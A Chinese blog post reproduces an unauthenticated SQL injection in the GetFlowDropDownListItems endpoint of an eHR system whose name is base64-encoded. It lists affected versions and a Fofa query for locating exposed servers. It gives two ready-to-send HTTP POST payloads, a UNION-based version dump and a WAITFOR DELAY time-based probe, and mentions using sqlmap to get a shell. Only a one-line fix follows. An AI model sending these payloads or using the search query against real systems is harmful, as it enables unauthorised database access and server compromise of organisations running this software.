5ZCM6ZGrVDllSFLkv6Hmga/ljJbnrqHnkIbns7vnu58= GetFlowDropDown SQL注入

已于 2024-09-23 10:27:57 修改
阅读量356 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-08-28 19:50:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xc_214/article/details/141648379
版权

0x01 漏洞描述:

5ZCM6ZGrVDllSFLkv6Hmga/ljJbnrqHnkIbns7vnu58= GetFlowDropDownListItems 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。

0x02 影响版本:

5ZCM6ZGrVDllSFINCg==

5ZCM6ZGrVDExZUhS

0x03 搜索语句:

Fofa:body="T9eHR"

222f06ba9e20454e83c7c26d616d9a4d.png

0x04 漏洞复现:

poc1:

POST /Common/GetFlowDropDownListItems HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded; charset=utf-8
 
FixedFormCode=1%27%20UNION%20ALL%20SELECT%20NULL%2C@@VERSION--

28b753c8befd460f90f4fa88c2030f01.png

poc2:

POST /Common/GetFlowDropDownListItems HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded; charset=utf-8

FixedFormCode=1' WAITFOR DELAY '0:0:5'-- DaFs

909daa25ce1d4bc89764ff8896a028aa.png

利用sqlmap进行shell

9f516c5d8370417e8c0ba00dd1016df7.png

0x05 修复建议:

关闭互联网暴露面或接口设置访问权限

iSee857
关注
专栏目录
同鑫eHR人力资源管理系统 GetFlowDropDownListItems SQL注入漏洞复现
0xSec
08-28 421
同鑫eHR人力资源管理系统 GetFlowDropDownListItems 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
用友U8 CRM swfupload 任意文件上传漏洞复现(XVE-2024-8597)
qq_39894062的博客
04-20 914
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。
(新接口)用友GRP-U8多个接口存在SQL 注入漏洞-0day
weixin_43167326的博客
02-22 459
用友GRP-U8是用友公司推出的一款企业级管理软件,涵盖财务、人力资源、供应链等多个领域,适用于各类企业。该系统拥有灵活的定制化功能,可根据企业需求进行模块选择和定制开发,满足不同行业的管理需求。用友GRP-U8整合了企业各业务环节,实现信息共享和流程优化,帮助企业提高管理效率,降低成本,提升竞争力。
同鑫T9eHR信息华管理系统GetDropDownListItems存在SQL注入漏洞
2301_77012231的博客
08-27 442
广州同鑫科技有限公司是专业从事人力资源管理系统eHR/OA一体化智慧云平台、智慧一卡通云平台、行业软件开发与定制、智慧企业管理信息化咨询与项目服务为核心业务的顾问式管理咨询和软件个性定制开发的高科技股份集团公司。广州同鑫科技有限公司同鑫T9eHR信息华管理系统GetDropDownListItems存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。
漏洞复现」同享人力资源管理系统-TXEHR V15 SFZService.asmx SQL注入漏洞
qq_39894062的博客
08-23 426
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
HW漏洞威胁情报第三十八天|HW情报
weixin_43167326的博客
08-29 728
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
ZCM报错publish: ../zcm/zcm.c:41: zcm_create: Assertion zcm_try_create(&z, url) == ZCM_EOK failed
weixin_43994482的博客
04-30 689
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 PICTUR...
Kubernetes基础1
weixin_45082683的博客
07-26 2万+
1.kubernetes部署 1.1 环境介绍 系统版本 Ubuntu 18.04.4 LTS 角色 主机名 IP 备注 k8s-master1 kubeadm-master1.haostack.com 172.16.62.18 k8s-master2 kubeadm-master2.haostack.com 172.16.62.19 k8s-master3 kubeadm-master3.haostack.com 172.16.62.20 ha1 ha1.haosta
Cmseasy_5.5的SQL注入
m0_62903168的博客
08-09 417
在cmseasy目录下的lib/admin/admin.php中有这么一句代码,可以让我们实现未授权访问进入到cmseasy的后台获取Cookie安全码,为我们后期的注入做准备。这句代码的意思是,当servip与客户的ip相等的时候以及ishtml=1时,可以不需要检查你是否为admin,直接进入到后台。
Ubuntu下zcm配置
01-06
GitHub下载ZCM代码包 ...在clone好的文件目录下,运行依赖...更具体的说明可以查看https://github.com/ZeroCM/zcm/blob/master/docs/building.md ZCM的GitHub主页上有丰富的学习材料,可以帮助你迅速了解ZCM,快速掌握
【uniapp公众号分销商城从0到1】手机验证注册登录(04)
热门推荐
Neil_1993的博客
12-12 8万+
资源一览: let _self; import { mapState, mapMutations, mapActions } from 'vuex' import tuiIcon from "@/components/icon/icon" import tuiButton from "@/components/button/button" const util = re...
部标主动安全(ADAS+DMS)对接说明
谁念西风独自凉
09-27 813
上一篇介绍了,这里说一下如何对接主动安全附件服务器。流媒体的对接主要牵扯到4个方面:(1)平台端:业务端系统,包含前端呈现界面。(2)JT/T808网关:部标设备接入网关,这个是非常重要的,是设备与平台进行数据交换的桥梁,流媒体相关的指令操作也必须依赖它完成。(3)部标视频机:符合JT/T808协议的车载视频机器。(4)流媒体服务:符合苏标、粤标、川标、陕标协议的主动安全附件服务,接收文件流,并存储。
【蚂蚁HR-注册/登录安全分析报告】
最新发布
09-28 1262
蚂蚁社保是武汉微蚁企业服务有限公司旗下的网站,主要提供五险一金的代缴、补缴、社保开户、社保挂靠和社保代理服务。该平台主要覆盖一二线城市,目前已覆盖13+城市。蚂蚁社保的特点是高度自动化和在线化,创始人团队致力于通过程序和硬件替代所有可以自动化的环节,从而最大限度地减少人为错误,作为头部的社保代缴平台, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。
Splashtop 加入 Microsoft 智能安全协会
SplashtopLoki的博客
09-27 790
Splashtop 的 Foxpass Cloud RADIUS 可提供精确的访问控制,保护 Wi-Fi 网络免受未授权用户和网络攻击的侵害,Foxpass 因其流畅的用户体验和强大的安全性而广受认可。MISA 由独立软件供应商(ISV)和托管安全服务提供商(MISA)组成,他们将其解决方案与 Microsoft 安全技术集成,以更好地保护我们共同的客户免受日益增长的网络威胁。MISA 的使命是提供行业领先的智能安全解决方案,在安全威胁不断增加的情况下,以 AI 的速度和规模保护组织安全
【注册/登录安全分析报告:孔夫子旧书网】
weixin_46641057的博客
09-27 1313
孔夫子网简称孔网,创建于2002年,是大型的二手旧货、古旧图书和商品交易平台,是传统文化行业结合互联网而搭建的C2C平台,是有传统文化价值的旧货市场。网站主要板块是书店区和拍卖区。网站秉承“网罗天下图书,传承中华文明”的理念,致力于发掘、抢救、保护和传播中国传统文化资源。作为旧古书二手市场平台的“独角兽”企业, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。
Unable to handle kernel paging request at virtual address 6b6b6b6b6b6bb7 这个原因是什么
06-03
这是一个常见的操作系统错误,通常是由于以下原因之一引起的: 1. 内存问题:可能是由于内存损坏或错误的内存使用而导致。可以尝试更换内存或运行内存测试工具来诊断问题。 2. 驱动程序问题:可能是由于驱动程序...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

iSee857

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值